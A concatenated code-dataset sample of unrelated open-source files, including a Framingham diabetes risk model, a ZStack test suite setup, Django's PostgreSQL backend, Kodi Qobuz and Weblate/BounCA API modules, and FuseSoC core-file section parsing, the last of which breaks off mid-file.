doirisks/dori | models/10.1001:archinte.167.10.1068/model_f.py | 1 | 4027 | """
model_f.py
by Ted Morin
contains a function to predict 8-year Diabtes Mellitus risks beta coefficients and logistic model from
10.1001/archinte.167.10.1068
2007 Prediction of Incident Diabetes Mellitus in Middle Aged Adults
Framingham Heart Study
(Table 5, Complex Model 2)
function expects parameters of:
"Male Sex" "Age" "Systolic BP" "Diastolic BP" "BMI" "Waist Circumf" "HDL-C" "Triglycerides" "Fasting Glucose"
years mm Hg mm Hg kg/m^2 cm mg/dL mg/dL mg/dL
bool int/float int/float int/float int/float i/f i/f i/f i/f
function expects parameters of (continued):
"Parental History of DM" "Antihypertensive Medication Use" "Gutt Insulin Sensitivity Index"
bool bool float/int
"""
# COMPLEX MODELS ARE INCOMPLETE: UNCHECKED + PERCENTILE VALUES NOT LISTED
def model(ismale,age,sbp,dbp,bmi,waistcirc,hdl,tri,glucose,parent,trtbp, guttinsul):
# imports
import numpy as np
# betas
# derived from Odds Ratios in paper
betas = np.array([
−5.427, #Intercept
0, #Age<50
-0.0043648054, #Age 50-64
-0.0915149811, #Age >=65
0.0492180227, #Male
0.2380461031, #Parental history of diabetes mellitus
0, #BMI <25
0.0681858617, #BMI 25.0-29.9
0.2552725051, #BMI >=30
0.1461280357, #Blood pressure >130/85 mm Hg or receiving therapy
0.3384564936, #HDL-C level <40 mg/dL in men or <50 mg/dL in women
0.1760912591, #Triglyceride level >=150 mg/dL
0.096910013, #Waist circumference >88 cm in women or >102 cm in men
0.7259116323, #Fasting glucose level 100-126 mg/dL
0, #2-Hour OGTT finding 140-200 mg/dL # Not Included
0, #Fasting insulin level >75th percentile # Not Included
0, #C-reactive protein level >75th percentile # Not Included
0.357934847, #Log Gutt insulin sensitivity index <25th percentile # TODO impossible?
0, #Log HOMA insulin resistance index >75th percentile # Not Included
0, #HOMA beta-cell index <25th percentile # Not Included
])
# determining factors:
values = [0]*20
values[0] = 1
# age
if age < 50:
values[1] = 1
elif age < 64 :
values[2] = 1
else :
values[3] = 1
# sex
if ismale:
values[4] = 1
# parental history
if parent:
values[5] = 1
# BMI
if bmi < 25.:
values[6] = 1
elif bmi < 30.:
values[7] = 1
else :
values[8] = 1
# blood pressure
if ((sbp >= 130.) or (dbp >= 85.) or trtbp) :
values[9] = 1
# HDL-C
if ismale and hdl < 40:
values[10] = 1
elif (not ismale) and hdl < 50:
values[10] = 1
# Triglycerides
if tri >= 150:
values[11] = 1
# Waist Circumference
if ismale and waistcirc > 102:
values[12] = 1
elif (not ismale) and waistcirc > 88:
values[12] = 1
# Fasting glucose
if glucose >= 100:
values[13] = 1
# Log GUTT insulin sensitivity index
guttinsul = np.log(guttinsul)
crit_guttinsul = -1000000 # real value not known TODO
if guttinsul < crit_guttinsul:
values[17] = 1
# dot betas and values
z = np.dot(betas,np.array(values))
# calculate risk
return 1.0 / (1 + np.exp(-z))
| gpl-3.0 | 3,382,809,701,925,434,000 | 34.307018 | 111 | 0.503602 | false |
zstackorg/zstack-woodpecker | integrationtest/vm/vpc/suite_setup.py | 1 | 4050 | '''
setup virtual router suite environment, including start zstack node, deploy
initial database, setup vlan devices.
@author: Frank
'''
import os
import zstacklib.utils.linux as linux
import zstacklib.utils.http as http
import zstacktestagent.plugins.host as host_plugin
import zstacktestagent.testagent as testagent
import zstackwoodpecker.operations.scenario_operations as scenario_operations
import zstackwoodpecker.operations.deploy_operations as deploy_operations
import zstackwoodpecker.operations.config_operations as config_operations
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.operations.config_operations as conf_ops
USER_PATH = os.path.expanduser('~')
EXTRA_SUITE_SETUP_SCRIPT = '%s/.zstackwoodpecker/extra_suite_setup_config.sh' % USER_PATH
EXTRA_HOST_SETUP_SCRIPT = '%s/.zstackwoodpecker/extra_host_setup_config.sh' % USER_PATH
def test():
if test_lib.scenario_config != None and test_lib.scenario_file != None and not os.path.exists(test_lib.scenario_file):
scenario_operations.deploy_scenario(test_lib.all_scenario_config, test_lib.scenario_file, test_lib.deploy_config)
test_util.test_skip('Suite Setup Success')
if test_lib.scenario_config != None and test_lib.scenario_destroy != None:
scenario_operations.destroy_scenario(test_lib.all_scenario_config, test_lib.scenario_destroy)
nic_name = "eth0"
if test_lib.scenario_config != None and test_lib.scenario_file != None and os.path.exists(test_lib.scenario_file):
nic_name = "zsn0"
linux.create_vlan_eth(nic_name, 1010)
linux.create_vlan_eth(nic_name, 1011)
#This vlan creation is not a must, if testing is under nested virt env. But it is required on physical host without enough physcial network devices and your test execution machine is not the same one as Host machine.
#linux.create_vlan_eth("eth0", 10, "10.0.0.200", "255.255.255.0")
#linux.create_vlan_eth("eth0", 11, "10.0.1.200", "255.255.255.0")
#no matter if current host is a ZStest host, we need to create 2 vlan devs for future testing connection for novlan test cases.
linux.create_vlan_eth(nic_name, 10)
linux.create_vlan_eth(nic_name, 11)
#If test execution machine is not the same one as Host machine, deploy work is needed to separated to 2 steps(deploy_test_agent, execute_plan_without_deploy_test_agent). And it can not directly call SetupAction.run()
test_lib.setup_plan.deploy_test_agent()
cmd = host_plugin.CreateVlanDeviceCmd()
hosts = test_lib.lib_get_all_hosts_from_plan()
if type(hosts) != type([]):
hosts = [hosts]
for host in hosts:
cmd.ethname = nic_name
cmd.vlan = 10
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.CREATE_VLAN_DEVICE_PATH), cmd)
cmd.vlan = 11
http.json_dump_post(testagent.build_http_path(host.managementIp_, host_plugin.CREATE_VLAN_DEVICE_PATH), cmd)
test_lib.setup_plan.execute_plan_without_deploy_test_agent()
conf_ops.change_global_config("applianceVm", "agent.deployOnStart", 'true')
if os.path.exists(EXTRA_SUITE_SETUP_SCRIPT):
os.system("bash %s" % EXTRA_SUITE_SETUP_SCRIPT)
deploy_operations.deploy_initial_database(test_lib.deploy_config, test_lib.all_scenario_config, test_lib.scenario_file)
for host in hosts:
os.system("bash %s %s" % (EXTRA_HOST_SETUP_SCRIPT, host.managementIp_))
delete_policy = test_lib.lib_set_delete_policy('vm', 'Direct')
delete_policy = test_lib.lib_set_delete_policy('volume', 'Direct')
delete_policy = test_lib.lib_set_delete_policy('image', 'Direct')
# if test_lib.lib_get_ha_selffencer_maxattempts() != None:
# test_lib.lib_set_ha_selffencer_maxattempts('60')
# test_lib.lib_set_ha_selffencer_storagechecker_timeout('60')
test_lib.lib_set_primary_storage_imagecache_gc_interval(1)
test_util.test_pass('Suite Setup Success')
| apache-2.0 | -1,399,914,541,662,224,000 | 53.479452 | 221 | 0.716543 | false |
wkschwartz/django | django/db/backends/postgresql/base.py | 1 | 13221 | """
PostgreSQL database backend for Django.
Requires psycopg 2: https://www.psycopg.org/
"""
import asyncio
import threading
import warnings
from contextlib import contextmanager
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.db import DatabaseError as WrappedDatabaseError, connections
from django.db.backends.base.base import BaseDatabaseWrapper
from django.db.backends.utils import (
CursorDebugWrapper as BaseCursorDebugWrapper,
)
from django.utils.asyncio import async_unsafe
from django.utils.functional import cached_property
from django.utils.safestring import SafeString
from django.utils.version import get_version_tuple
try:
import psycopg2 as Database
import psycopg2.extensions
import psycopg2.extras
except ImportError as e:
raise ImproperlyConfigured("Error loading psycopg2 module: %s" % e)
def psycopg2_version():
version = psycopg2.__version__.split(' ', 1)[0]
return get_version_tuple(version)
PSYCOPG2_VERSION = psycopg2_version()
if PSYCOPG2_VERSION < (2, 5, 4):
raise ImproperlyConfigured("psycopg2_version 2.5.4 or newer is required; you have %s" % psycopg2.__version__)
# Some of these import psycopg2, so import them after checking if it's installed.
from .client import DatabaseClient # NOQA
from .creation import DatabaseCreation # NOQA
from .features import DatabaseFeatures # NOQA
from .introspection import DatabaseIntrospection # NOQA
from .operations import DatabaseOperations # NOQA
from .schema import DatabaseSchemaEditor # NOQA
psycopg2.extensions.register_adapter(SafeString, psycopg2.extensions.QuotedString)
psycopg2.extras.register_uuid()
# Register support for inet[] manually so we don't have to handle the Inet()
# object on load all the time.
INETARRAY_OID = 1041
INETARRAY = psycopg2.extensions.new_array_type(
(INETARRAY_OID,),
'INETARRAY',
psycopg2.extensions.UNICODE,
)
psycopg2.extensions.register_type(INETARRAY)
class DatabaseWrapper(BaseDatabaseWrapper):
vendor = 'postgresql'
display_name = 'PostgreSQL'
# This dictionary maps Field objects to their associated PostgreSQL column
# types, as strings. Column-type strings can contain format strings; they'll
# be interpolated against the values of Field.__dict__ before being output.
# If a column type is set to None, it won't be included in the output.
data_types = {
'AutoField': 'serial',
'BigAutoField': 'bigserial',
'BinaryField': 'bytea',
'BooleanField': 'boolean',
'CharField': 'varchar(%(max_length)s)',
'DateField': 'date',
'DateTimeField': 'timestamp with time zone',
'DecimalField': 'numeric(%(max_digits)s, %(decimal_places)s)',
'DurationField': 'interval',
'FileField': 'varchar(%(max_length)s)',
'FilePathField': 'varchar(%(max_length)s)',
'FloatField': 'double precision',
'IntegerField': 'integer',
'BigIntegerField': 'bigint',
'IPAddressField': 'inet',
'GenericIPAddressField': 'inet',
'JSONField': 'jsonb',
'NullBooleanField': 'boolean',
'OneToOneField': 'integer',
'PositiveBigIntegerField': 'bigint',
'PositiveIntegerField': 'integer',
'PositiveSmallIntegerField': 'smallint',
'SlugField': 'varchar(%(max_length)s)',
'SmallAutoField': 'smallserial',
'SmallIntegerField': 'smallint',
'TextField': 'text',
'TimeField': 'time',
'UUIDField': 'uuid',
}
data_type_check_constraints = {
'PositiveBigIntegerField': '"%(column)s" >= 0',
'PositiveIntegerField': '"%(column)s" >= 0',
'PositiveSmallIntegerField': '"%(column)s" >= 0',
}
operators = {
'exact': '= %s',
'iexact': '= UPPER(%s)',
'contains': 'LIKE %s',
'icontains': 'LIKE UPPER(%s)',
'regex': '~ %s',
'iregex': '~* %s',
'gt': '> %s',
'gte': '>= %s',
'lt': '< %s',
'lte': '<= %s',
'startswith': 'LIKE %s',
'endswith': 'LIKE %s',
'istartswith': 'LIKE UPPER(%s)',
'iendswith': 'LIKE UPPER(%s)',
}
# The patterns below are used to generate SQL pattern lookup clauses when
# the right-hand side of the lookup isn't a raw string (it might be an expression
# or the result of a bilateral transformation).
# In those cases, special characters for LIKE operators (e.g. \, *, _) should be
# escaped on database side.
#
# Note: we use str.format() here for readability as '%' is used as a wildcard for
# the LIKE operator.
pattern_esc = r"REPLACE(REPLACE(REPLACE({}, E'\\', E'\\\\'), E'%%', E'\\%%'), E'_', E'\\_')"
pattern_ops = {
'contains': "LIKE '%%' || {} || '%%'",
'icontains': "LIKE '%%' || UPPER({}) || '%%'",
'startswith': "LIKE {} || '%%'",
'istartswith': "LIKE UPPER({}) || '%%'",
'endswith': "LIKE '%%' || {}",
'iendswith': "LIKE '%%' || UPPER({})",
}
Database = Database
SchemaEditorClass = DatabaseSchemaEditor
# Classes instantiated in __init__().
client_class = DatabaseClient
creation_class = DatabaseCreation
features_class = DatabaseFeatures
introspection_class = DatabaseIntrospection
ops_class = DatabaseOperations
# PostgreSQL backend-specific attributes.
_named_cursor_idx = 0
def get_connection_params(self):
settings_dict = self.settings_dict
# None may be used to connect to the default 'postgres' db
if settings_dict['NAME'] == '':
raise ImproperlyConfigured(
"settings.DATABASES is improperly configured. "
"Please supply the NAME value.")
if len(settings_dict['NAME'] or '') > self.ops.max_name_length():
raise ImproperlyConfigured(
"The database name '%s' (%d characters) is longer than "
"PostgreSQL's limit of %d characters. Supply a shorter NAME "
"in settings.DATABASES." % (
settings_dict['NAME'],
len(settings_dict['NAME']),
self.ops.max_name_length(),
)
)
conn_params = {
'database': settings_dict['NAME'] or 'postgres',
**settings_dict['OPTIONS'],
}
conn_params.pop('isolation_level', None)
if settings_dict['USER']:
conn_params['user'] = settings_dict['USER']
if settings_dict['PASSWORD']:
conn_params['password'] = settings_dict['PASSWORD']
if settings_dict['HOST']:
conn_params['host'] = settings_dict['HOST']
if settings_dict['PORT']:
conn_params['port'] = settings_dict['PORT']
return conn_params
@async_unsafe
def get_new_connection(self, conn_params):
connection = Database.connect(**conn_params)
# self.isolation_level must be set:
# - after connecting to the database in order to obtain the database's
# default when no value is explicitly specified in options.
# - before calling _set_autocommit() because if autocommit is on, that
# will set connection.isolation_level to ISOLATION_LEVEL_AUTOCOMMIT.
options = self.settings_dict['OPTIONS']
try:
self.isolation_level = options['isolation_level']
except KeyError:
self.isolation_level = connection.isolation_level
else:
# Set the isolation level to the value from OPTIONS.
if self.isolation_level != connection.isolation_level:
connection.set_session(isolation_level=self.isolation_level)
# Register dummy loads() to avoid a round trip from psycopg2's decode
# to json.dumps() to json.loads(), when using a custom decoder in
# JSONField.
psycopg2.extras.register_default_jsonb(conn_or_curs=connection, loads=lambda x: x)
return connection
def ensure_timezone(self):
if self.connection is None:
return False
conn_timezone_name = self.connection.get_parameter_status('TimeZone')
timezone_name = self.timezone_name
if timezone_name and conn_timezone_name != timezone_name:
with self.connection.cursor() as cursor:
cursor.execute(self.ops.set_time_zone_sql(), [timezone_name])
return True
return False
def init_connection_state(self):
self.connection.set_client_encoding('UTF8')
timezone_changed = self.ensure_timezone()
if timezone_changed:
# Commit after setting the time zone (see #17062)
if not self.get_autocommit():
self.connection.commit()
@async_unsafe
def create_cursor(self, name=None):
if name:
# In autocommit mode, the cursor will be used outside of a
# transaction, hence use a holdable cursor.
cursor = self.connection.cursor(name, scrollable=False, withhold=self.connection.autocommit)
else:
cursor = self.connection.cursor()
cursor.tzinfo_factory = self.tzinfo_factory if settings.USE_TZ else None
return cursor
def tzinfo_factory(self, offset):
return self.timezone
@async_unsafe
def chunked_cursor(self):
self._named_cursor_idx += 1
# Get the current async task
# Note that right now this is behind @async_unsafe, so this is
# unreachable, but in future we'll start loosening this restriction.
# For now, it's here so that every use of "threading" is
# also async-compatible.
try:
if hasattr(asyncio, 'current_task'):
# Python 3.7 and up
current_task = asyncio.current_task()
else:
# Python 3.6
current_task = asyncio.Task.current_task()
except RuntimeError:
current_task = None
# Current task can be none even if the current_task call didn't error
if current_task:
task_ident = str(id(current_task))
else:
task_ident = 'sync'
# Use that and the thread ident to get a unique name
return self._cursor(
name='_django_curs_%d_%s_%d' % (
# Avoid reusing name in other threads / tasks
threading.current_thread().ident,
task_ident,
self._named_cursor_idx,
)
)
def _set_autocommit(self, autocommit):
with self.wrap_database_errors:
self.connection.autocommit = autocommit
def check_constraints(self, table_names=None):
"""
Check constraints by setting them to immediate. Return them to deferred
afterward.
"""
with self.cursor() as cursor:
cursor.execute('SET CONSTRAINTS ALL IMMEDIATE')
cursor.execute('SET CONSTRAINTS ALL DEFERRED')
def is_usable(self):
try:
# Use a psycopg cursor directly, bypassing Django's utilities.
with self.connection.cursor() as cursor:
cursor.execute('SELECT 1')
except Database.Error:
return False
else:
return True
@contextmanager
def _nodb_cursor(self):
try:
with super()._nodb_cursor() as cursor:
yield cursor
except (Database.DatabaseError, WrappedDatabaseError):
warnings.warn(
"Normally Django will use a connection to the 'postgres' database "
"to avoid running initialization queries against the production "
"database when it's not needed (for example, when running tests). "
"Django was unable to create a connection to the 'postgres' database "
"and will use the first PostgreSQL database instead.",
RuntimeWarning
)
for connection in connections.all():
if connection.vendor == 'postgresql' and connection.settings_dict['NAME'] != 'postgres':
conn = self.__class__(
{**self.settings_dict, 'NAME': connection.settings_dict['NAME']},
alias=self.alias,
)
try:
with conn.cursor() as cursor:
yield cursor
finally:
conn.close()
break
else:
raise
@cached_property
def pg_version(self):
with self.temporary_connection():
return self.connection.server_version
def make_debug_cursor(self, cursor):
return CursorDebugWrapper(cursor, self)
class CursorDebugWrapper(BaseCursorDebugWrapper):
def copy_expert(self, sql, file, *args):
with self.debug_sql(sql):
return self.cursor.copy_expert(sql, file, *args)
def copy_to(self, file, table, *args, **kwargs):
with self.debug_sql(sql='COPY %s TO STDOUT' % table):
return self.cursor.copy_to(file, table, *args, **kwargs)
| bsd-3-clause | 582,152,056,054,091,400 | 37.54519 | 113 | 0.603736 | false |
tidalf/plugin.audio.qobuz | resources/lib/qobuz/node/similar_artist.py | 1 | 1695 | '''
qobuz.node.similar_artist
~~~~~~~~~~~~~~~~~~~~~~~~~
:part_of: kodi-qobuz
:copyright: (c) 2012-2018 by Joachim Basmaison, Cyril Leclerc
:license: GPLv3, see LICENSE for more details.
'''
from qobuz import config
from qobuz.api import api
from qobuz.gui.util import lang
from qobuz.node import getNode, Flag, helper
from qobuz.node.inode import INode
from qobuz.debug import getLogger
logger = getLogger(__name__)
class Node_similar_artist(INode):
def __init__(self, parent=None, parameters=None, data=None):
parameters = {} if parameters is None else parameters
super(Node_similar_artist, self).__init__(
parent=parent, parameters=parameters, data=data)
self.nt = Flag.SIMILAR_ARTIST
self.content_type = 'artists'
self.lang = lang(30156)
def fetch(self, options=None):
return api.get('/artist/getSimilarArtists',
artist_id=self.nid,
offset=self.offset,
limit=self.limit)
def _count(self):
return len(self.data['artists']['items'])
def populate(self, options=None):
skip_empty = not config.app.registry.get(
'display_artist_without_album', to='bool')
for data in self.data['artists']['items']:
if skip_empty and data['albums_count'] < 1:
continue
artist = getNode(Flag.ARTIST, data=data)
cache = artist.fetch(helper.TreeTraverseOpts(lvl=3,noRemote=True))
if cache is not None:
artist.data = cache
self.add_child(artist)
return True if len(self.data['artists']['items']) > 0 else False
| gpl-3.0 | 2,751,515,988,515,557,400 | 34.3125 | 78 | 0.60472 | false |
lem9/weblate | weblate/api/urls.py | 1 | 1842 | # -*- coding: utf-8 -*-
#
# Copyright © 2012 - 2017 Michal Čihař <[email protected]>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
from __future__ import unicode_literals
from django.conf.urls import url, include
from weblate.api.views import (
ProjectViewSet, ComponentViewSet, TranslationViewSet, LanguageViewSet,
UnitViewSet, ChangeViewSet, SourceViewSet, ScreenshotViewSet,
)
from weblate.api.routers import WeblateRouter
# Routers provide an easy way of automatically determining the URL conf.
router = WeblateRouter()
router.register(
r'projects',
ProjectViewSet
)
router.register(
r'components',
ComponentViewSet,
'component',
)
router.register(
r'translations',
TranslationViewSet
)
router.register(
r'languages',
LanguageViewSet
)
router.register(
r'changes',
ChangeViewSet
)
router.register(
r'units',
UnitViewSet
)
router.register(
r'sources',
SourceViewSet
)
router.register(
r'screenshots',
ScreenshotViewSet
)
# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
url(
r'^',
include(router.urls)
),
]
| gpl-3.0 | -5,053,262,542,800,978,000 | 23.52 | 74 | 0.72485 | false |
repleo/bounca | api/urls.py | 1 | 1469 | """API v1 end-points"""
from django.conf.urls import include, url
from rest_auth.registration.urls import urlpatterns as urlpatterns_registration
from rest_auth.urls import urlpatterns as urlpatterns_rest_auth
from rest_framework_swagger.views import get_swagger_view
from .views import (
CertificateCRLFileView, CertificateCRLView, CertificateFilesView, CertificateInfoView, CertificateInstanceView,
CertificateListView, CertificateRevokeView)
urlpatterns_apiv1 = [
url(r'^certificates/files/(?P<pk>[\d]+)$', CertificateFilesView.as_view(), name='certificate-files'),
url(r'^certificates/crl/(?P<pk>[\d]+)$', CertificateCRLView.as_view(), name='certificate-crl'),
url(r'^certificates/crlfile/(?P<pk>[\d]+)$', CertificateCRLFileView.as_view(), name='certificate-crl-file'),
url(r'^certificates/(?P<pk>[\d]+)$', CertificateInstanceView.as_view(), name='certificate-instance'),
url(r'^certificates/info/(?P<pk>[\d]+)$', CertificateInfoView.as_view(), name='certificate-info'),
url(r'^certificates/revoke/(?P<pk>[\d]+)$', CertificateRevokeView.as_view(), name='certificate-revoke'),
url(r'^certificates', CertificateListView.as_view(), name='certificates'),
url(r'^auth/', include(urlpatterns_rest_auth)),
url(r'^auth/registration/', include(urlpatterns_registration))
]
schema_view = get_swagger_view(title='BounCA API')
urlpatterns = [
url(r'^v1/', include(urlpatterns_apiv1)),
url(r'docs/', schema_view),
]
| apache-2.0 | 38,793,706,840,446,420 | 42.205882 | 115 | 0.720218 | false |
chiggs/fusesoc | fusesoc/section.py | 1 | 18237 | import os
from fusesoc.config import Config
from fusesoc import utils
from fusesoc.utils import Launcher, pr_warn, pr_info, unique_dirs
class File(object):
name = ""
file_type = ""
is_include_file = False
logical_name = ""
def __init__(self, s):
self.is_include_file = False
if s[-1:] == ']':
_tmp = s[:-1].split('[')
if(len(_tmp) != 2):
raise SyntaxError("Expected '['")
self.name = _tmp[0]
for _arg in [x.strip() for x in _tmp[1].split(',')]:
if _arg == "is_include_file":
self.is_include_file = True
elif '=' in _arg:
_tmp = [x.strip() for x in _arg.split('=')]
if _tmp[0] in ['file_type', 'logical_name']:
setattr(self, _tmp[0], _tmp[1])
else:
raise SyntaxError("Unexpected argument '"+_arg+"'")
else:
self.name = s
class Error(Exception):
pass
class NoSuchItemError(Error):
pass
class UnknownSection(Error):
pass
class StringList(list):
def __new__(cls, *args, **kwargs):
if not args:
return list()
else:
return list(args[0].split())
class PathList(StringList):
def __new__(cls, *args, **kwargs):
if not args:
return list()
else:
return [os.path.expandvars(p) for p in args[0].split()]
class FileList(PathList):
def __new__(clk, *args, **kwargs):
if not args:
return list()
else:
return [File(p) for p in PathList(args[0])]
class EnumList(list):
def __new__(cls, *args, **kwargs):
if not args:
return super(EnumList, cls).__new__(cls)
else:
values = kwargs['values']
_args = args[0].split()
for arg in _args:
if not arg in values:
raise ValueError("Invalid value '" + str(arg) + "'. Allowed values are '" + "', '".join(values)+"'")
return list(args[0].split())
class SimulatorList(EnumList):
def __new__(cls, *args, **kwargs):
values = ['icarus', 'modelsim', 'verilator', 'isim', 'xsim']
return super(SimulatorList, cls).__new__(cls, *args, values=values)
class SourceType(str):
def __new__(cls, *args, **kwargs):
if args:
arg = args[0]
values = ['C', 'CPP', 'systemC']
if arg in values:
return str(arg)
raise ValueError("Invalid value '" + str(arg) + "'. Allowed values are '" + "', '".join(values)+"'")
return str
class Section(object):
TAG = None
named = False
def __init__(self):
self._members = {}
self.export_files = []
self.warnings = []
def _add_member(self, name, _type, desc):
self._members[name] = {'type' : _type, 'desc' : desc}
setattr(self, name, _type())
def export(self):
return self.export_files
def load_dict(self, items):
for item in items:
if item in self._members:
_type = self._members.get(item)['type']
setattr(self, item, _type(items.get(item)))
else:
self.warnings.append(
'Unknown item "%(item)s" in section "%(section)s"' % {
'item': item, 'section': self.TAG})
def __str__(self):
s = ''
for k,v in self._members.items():
if isinstance(v.get('type'), list):
s += k + ' : ' + ';'.join(getattr(self, item)) + '\n'
elif isinstance(v.get('type'), str):
s += k + ' : ' + getattr(self, k) + '\n'
return s
class ScriptsSection(Section):
TAG = 'scripts'
def __init__(self, items=None):
super(ScriptsSection, self).__init__()
self._add_member('pre_build_scripts', StringList, 'Scripts to run before building')
self._add_member('pre_run_scripts' , StringList, 'Scripts to run before running simulations')
self._add_member('post_run_scripts' , StringList, 'Scripts to run after simulations')
if items:
self.load_dict(items)
class ToolSection(Section):
def __init__(self):
super(ToolSection, self).__init__()
self._add_member('depend', StringList, "Tool-specific Dependencies")
class MainSection(Section):
TAG = 'main'
def __init__(self, items=None):
super(MainSection, self).__init__()
self._add_member('description', str, "Core description")
self._add_member('depend' , StringList, "Common dependencies")
self._add_member('simulators' , SimulatorList, "Supported simulators. Valid values are icarus, modelsim, verilator, isim and xsim. Each simulator have a dedicated section desribed elsewhere in this document")
self._add_member('patches' , StringList, "FuseSoC-specific patches")
if items:
self.load_dict(items)
class VhdlSection(Section):
TAG = 'vhdl'
def __init__(self, items=None):
super(VhdlSection, self).__init__()
self._add_member('src_files', PathList, "VHDL source files for simulation and synthesis")
if items:
self.load_dict(items)
self.export_files = self.src_files
class VerilogSection(Section):
TAG = 'verilog'
def __init__(self, items=None):
super(VerilogSection, self).__init__()
self.include_dirs = []
self.tb_include_dirs = []
self._add_member('src_files' , FileList, "Verilog source files for synthesis/simulation")
self._add_member('include_files' , FileList, "Verilog include files")
self._add_member('tb_src_files' , FileList, "Verilog source files that are only used in simulation. Visible to other cores")
self._add_member('tb_private_src_files', FileList, "Verilog source files that are only used in the core's own testbench. Not visible to other cores")
self._add_member('tb_include_files' , FileList, "Testbench include files")
self._add_member('file_type' , str , "Default file type of the files in fileset")
if items:
self.load_dict(items)
if not self.file_type:
self.file_type = "verilogSource"
if self.include_files:
self.include_dirs += utils.unique_dirs(self.include_files)
if self.tb_include_files:
self.tb_include_dirs += utils.unique_dirs(self.tb_include_files)
self.export_files = self.src_files + self.include_files + self.tb_src_files + self.tb_include_files + self.tb_private_src_files
def __str__(self):
s = ""
if self.src_files: s += "\nRTL source files :\n {}".format('\n '.join(self.src_files))
if self.include_files: s += "\nRTL include files :\n {}".format('\n '.join(self.include_files))
if self.include_dirs: s += "\nRTL Include directories :\n {}".format('\n '.join(self.include_dirs))
if self.tb_src_files: s += "\nPublic testbench source files :\n {}".format('\n '.join(self.tb_src_files))
if self.tb_private_src_files: s += "\nPrivate testbench source files :\n {}".format('\n '.join(self.tb_private_src_files))
if self.tb_include_files: s += "\nTestbench include files :\n {}".format('\n '.join(self.tb_include_files))
if self.tb_include_dirs: s += "\nTestbench include directories :\n {}".format('\n '.join(self.tb_include_dirs))
return s
class FileSetSection(Section):
TAG = 'fileset'
named = True
def __init__(self, items=None):
super(FileSetSection, self).__init__()
self._add_member('files' , FileList, "List of files in fileset")
self._add_member('file_type' , str , "Default file type of the files in fileset")
self._add_member('is_include_file', str , "Specify all files in fileset as include files")
self._add_member('logical_name' , str , "Default logical_name (e.g. library) of the files in fileset")
self._add_member('scope' , str , "Visibility of fileset (private/public). Private filesets are only visible when this core is the top-level. Public filesets are visible also for cores that depend on this core. Default is public")
self._add_member('usage' , StringList, "List of tags describing when this fileset should be used. Can be general such as sim or synth, or tool-specific such as quartus, verilator, icarus")
if items:
self.load_dict(items)
for f in self.files:
if not f.file_type:
f.file_type = self.file_type
if self.is_include_file.lower() == "true":
f.is_include_file = True
if not f.logical_name:
f.logical_name = self.logical_name
self.export_files = self.files
class VpiSection(Section):
TAG = 'vpi'
def __init__(self, items=None):
super(VpiSection, self).__init__()
self.include_dirs = []
self._add_member('src_files' , FileList, "C source files for VPI library")
self._add_member('include_files', FileList, "C include files for VPI library")
self._add_member('libs' , StringList, "External libraries linked with the VPI library")
if items:
self.load_dict(items)
if self.include_files:
self.include_dirs += unique_dirs(self.include_files)
self.export_files = self.src_files + self.include_files
class ModelsimSection(ToolSection):
TAG = 'modelsim'
def __init__(self, items=None):
super(ModelsimSection, self).__init__()
self._add_member('vlog_options', StringList, "Additional arguments for vlog")
self._add_member('vsim_options', StringList, "Additional arguments for vsim")
if items:
self.load_dict(items)
class IcarusSection(ToolSection):
TAG = 'icarus'
def __init__(self, items=None):
super(IcarusSection, self).__init__()
self._add_member('iverilog_options', StringList, "Extra Icarus verilog compile options")
if items:
self.load_dict(items)
def __str__(self):
s = ""
if self.depend: s += "Icarus-specific dependencies : {}\n".format(' '.join(self.depend))
if self.iverilog_options: s += "Icarus compile options : {}\n".format(' '.join(self.iverilog_options))
return s
class IsimSection(ToolSection):
TAG = 'isim'
def __init__(self, items=None):
super(IsimSection, self).__init__()
self._add_member('isim_options', StringList, "Extra Isim compile options")
if items:
self.load_dict(items)
def __str__(self):
s = ""
if self.depend: s += "Isim-specific dependencies : {}\n".format(' '.join(self.depend))
if self.isim_options: s += "Isim compile options : {}\n".format(' '.join(self.isim_options))
return s
class XsimSection(ToolSection):
TAG = 'xsim'
def __init__(self, items=None):
super(XsimSection, self).__init__()
self._add_member('xsim_options', StringList, "Extra Xsim compile options")
if items:
self.load_dict(items)
def __str__(self):
s = ""
if self.depend: s += "Xsim-specific dependencies : {}\n".format(' '.join(self.depend))
if self.xsim_options: s += "Xsim compile options : {}\n".format(' '.join(self.xsim_options))
return s
class VerilatorSection(ToolSection):
TAG = 'verilator'
def __init__(self, items=None):
super(VerilatorSection, self).__init__()
self.include_dirs = []
self.archive = False
self._object_files = []
self._add_member('verilator_options', StringList, "Verilator build options")
self._add_member('src_files' , FileList , "Verilator testbench C/cpp/sysC source files")
self._add_member('include_files' , FileList , "Verilator testbench C include files")
self._add_member('define_files' , PathList , "Verilog include files containing `define directives to be converted to C #define directives in corresponding .h files")
self._add_member('libs' , PathList , "External libraries linked with the generated model")
self._add_member('tb_toplevel', str, 'Testbench top-level C/C++/SC file')
self._add_member('source_type', str, 'Testbench source code language (Legal values are systemC, C, CPP. Default is C)')
self._add_member('top_module' , str, 'verilog top-level module')
if items:
self.load_dict(items)
self.include_dirs = unique_dirs(self.include_files)
if self.src_files:
self._object_files = [os.path.splitext(os.path.basename(s.name))[0]+'.o' for s in self.src_files]
self.archive = True
self.export_files = self.src_files + self.include_files
def __str__(self):
s = """Verilator options : {verilator_options}
Testbench source files : {src_files}
Testbench include files : {include_files}
Testbench define files : {define_files}
External libraries : {libs}
Testbench top level : {tb_toplevel}
Testbench source type : {source_type}
Verilog top module : {top_module}
"""
return s.format(verilator_options=' '.join(self.verilator_options),
src_files = ' '.join(self.src_files),
include_files=' '.join(self.include_files),
define_files=' '.join(self.define_files),
libs=' '.join(self.libs),
tb_toplevel=self.tb_toplevel,
source_type=self.source_type,
top_module=self.top_module)
class IseSection(ToolSection):
TAG = 'ise'
def __init__(self, items=None):
super(IseSection, self).__init__()
self._add_member('ucf_files' , PathList, "UCF constraint files")
